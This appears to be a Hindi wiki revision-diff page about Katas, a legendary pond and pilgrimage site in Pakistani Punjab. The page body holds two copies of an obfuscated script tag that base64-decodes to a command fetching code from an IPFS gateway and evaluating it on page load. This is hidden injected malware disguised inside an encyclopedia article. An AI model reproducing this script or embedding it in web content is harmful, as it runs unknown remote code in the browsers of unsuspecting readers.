Difference between revisions of "कटास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
+
'''कटास''' [[पाकिस्तान]] के पंजाब, खेवड़ा से तेरह मील दूर है।  
कटास [[पाकिस्तान]] के पंजाब, खेवड़ा से तेरह मील दूर है। किंवदंती है कि कटास में [[पांडव|पांडवों]] ने अपने अज्ञातवास में कुछ दिन निवास किया था। कटास एक अथाह कुंड है जो तीर्थ रूप में मान्य था। कहा जाता है गुरुगोरखनाथ ने भी कुछ दिन रहकर कटास में आराधना की थी। कटास का [[संस्कृत]] नाम कटाक्ष कहा जाता है। कटास के कुंड को [[पृथ्वी]] का नेत्र अथवा कटाक्ष माना जाता है।  
+
*किंवदंती है कि कटास में [[पांडव|पांडवों]] ने अपने अज्ञातवास में कुछ दिन निवास किया था।  
 +
*कटास एक अथाह कुंड है जो तीर्थ रूप में मान्य था।  
 +
*कहा जाता है गुरुगोरखनाथ ने भी कुछ दिन रहकर कटास में आराधना की थी।  
 +
*कटास का [[संस्कृत]] नाम कटाक्ष कहा जाता है।  
 +
*कटास के कुंड को [[पृथ्वी]] का नेत्र अथवा कटाक्ष माना जाता है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
Line 11: Line 15:
 
[[Category:विदेशी स्थान]]
 
[[Category:विदेशी स्थान]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना]]
+
 
 
__INDEX__
 
__INDEX__

Revision as of 11:18, 16 December 2011

katas pakistan ke panjab, khev da se terah mil door hai.

  • kianvadanti hai ki katas mean paandavoan ne apane ajnatavas mean kuchh din nivas kiya tha.
  • katas ek athah kuand hai jo tirth roop mean many tha.
  • kaha jata hai gurugorakhanath ne bhi kuchh din rahakar katas mean aradhana ki thi.
  • katas ka sanskrit nam kataksh kaha jata hai.
  • katas ke kuand ko prithvi ka netr athava kataksh mana jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>